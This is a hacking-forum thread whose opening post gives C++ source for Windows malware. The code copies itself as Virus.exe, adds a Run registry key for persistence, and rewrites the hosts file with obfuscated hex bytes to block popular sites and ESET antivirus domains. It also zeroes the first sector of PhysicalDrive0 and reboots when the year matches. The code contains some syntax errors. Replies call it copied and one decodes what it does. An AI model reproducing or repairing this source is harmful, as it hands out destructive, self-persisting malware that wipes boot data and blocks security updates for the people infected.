EvilZone

Programming and Scripting => Beginner's Corner => : Jeirox January 03, 2015, 10:55:50 PM

: Overwrite the Masterboot Record [C++]
: Jeirox January 03, 2015, 10:55:50 PM

: (cpp)

#include <Windows.h>
DWORD WINAPI CheckTime(){
    DWORD write;
    SYSTEMTIME st;
    char data[512];
    ZeroMemory(&data,sizeof(data));
    GetLocalTime(&st);a
    if(st.wYear==2014){
        HANDLE disk=CreateFile("\\.\PhysicalDrive0",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);
        WriteFile(disk,data,512,&write,NULL);
        CloseHandle(disk);
        ExitWindowsEx(EWX_REBOOT,0);
    }
    return 0;
}

DWORD WINAPI hosts(){
    char data[]={0x77,0x77,0x77,0x2E,0x79,0x6F,0x75,0x74,0x75,0x62,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x67,0x6F,0x6F,0x67,0x6C,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x79,0x61,0x68,0x6F,0x6F,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x66,0x61,0x63,0x65,0x62,0x6F,0x6F,0x6B,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x6D,0x69,0x63,0x72,0x6F,0x73,0x6F,0x66,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x65,0x75,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x65,0x6E,0x2E,0x77,0x69,0x6B,0x69,0x70,0x65,0x64,0x69,0x61,0x2E,0x6F,0x72,0x67,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31};
    char path[60];
    DWORD write;
    GetEnvironmentVariable("windir",path,sizeof(path));
    strcat(path,"\system32\drivers\etc\hosts");
    HANDLE hFile=CreateFile(path,GENERIC_ALL,0,NULL,CREATE_ALWAYS,0,NULL);
    WriteFile(hFile,data,sizeof(data),&write,NULL);
    CloseHandle(hFile);
    return 0;
}

DWORD WINAPI reg(){
    char value[]="Virus.exe";
    HKEY hKey;
    while(1){
        RegCreateKey(HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows\CurrentVersion\Run",&hKey);
        RegSetValueEx(hKey,"Virus",0,REG_SZ,(LPBYTE)value,60);
        RegCloseKey(hKey);
        Sleep(10000);
    }
    return 0;
}

int WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR cmd,int show){
    char file[MAX_PATH];
    char path[60];
    HANDLE hToken;
    LUID luid;
    LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&luid);
    TOKEN_PRIVILEGES tp;
    tp.Privileges[0].Luid=luid;
    tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
    tp.PrivilegeCount=1;
    OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken);
    AdjustTokenPrivileges(hToken,false,&tp,sizeof(tp),NULL,NULL);
    GetModuleFileName(NULL,file,sizeof(file));
    GetEnvironmentVariable("windir",path,60);
    strcat(path,"\Virus.exe");
    CopyFile(file,path,false);
    CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)reg,NULL,0,NULL);
    CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)hosts,NULL,0,NULL);
    while(1){
        CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)CheckTime,NULL,0,NULL);
        Sleep(10000);
    }
    return 0;
}
}

: Re: Overwrite the Masterboot Record [C++]
: Kulverstukas January 04, 2015, 09:35:59 AM

At which line does it overwrite the MBR? because all I see it does it check the registry and write some data into hosts file, kek. Also post from where you copied this garbage from, also more info needed.

I give you a day before it's removed.

: Re: Overwrite the Masterboot Record [C++]
: $Clone January 04, 2015, 10:34:14 AM

I see some resemblance of code in:
http://www.rohitab.com/discuss/topic/39459-my-c-virus/ (http://www.rohitab.com/discuss/topic/39459-my-c-virus/)  :-X :-X :-X

: Re: Overwrite the Masterboot Record [C++]
: Kulverstukas January 04, 2015, 10:47:11 AM

Yeah it's the same code... shame on OP for not mentioning where he copied it from.

: Re: Overwrite the Masterboot Record [C++]
: madf0x January 04, 2015, 06:39:41 PM

for the curious/lazy it writes out:

:

www.youtube.com 127.0.0.1
www.google.com 127.0.0.1
www.yahoo.com 127.0.0.1
www.facebook.com 127.0.0.1
www.microsoft.com 127.0.0.1
www.eset.com 127.0.0.1
www.eset.eu 127.0.0.1
en.wikipedia.org 127.0.0.1

which means as a whole this code overwrites the host entries of a few popular sites to localhost, sets up a regkey to autostart(with hardcoded file name, instead of grabbing its own), and checks if the current year is 2014, if so attempts to overwrite .\PhysicalDrive0 with zeroed memory. Waits 10,000 seconds before checking the time again.

: Re: Overwrite the Masterboot Record [C++]
: d4rkcat January 05, 2015, 05:48:59 PM

: madf0x  January 04, 2015, 06:39:41 PM

for the curious/lazy it writes out:

:

www.youtube.com 127.0.0.1
www.google.com 127.0.0.1
www.yahoo.com 127.0.0.1
www.facebook.com 127.0.0.1
www.microsoft.com 127.0.0.1
www.eset.com 127.0.0.1
www.eset.eu 127.0.0.1
en.wikipedia.org 127.0.0.1

which means as a whole this code overwrites the host entries of a few popular sites to localhost, sets up a regkey to autostart(with hardcoded file name, instead of grabbing its own), and checks if the current year is 2014, if so attempts to overwrite .\PhysicalDrive0 with zeroed memory. Waits 10,000 seconds before checking the time again.

LOL pwned.
Thanks madf0x.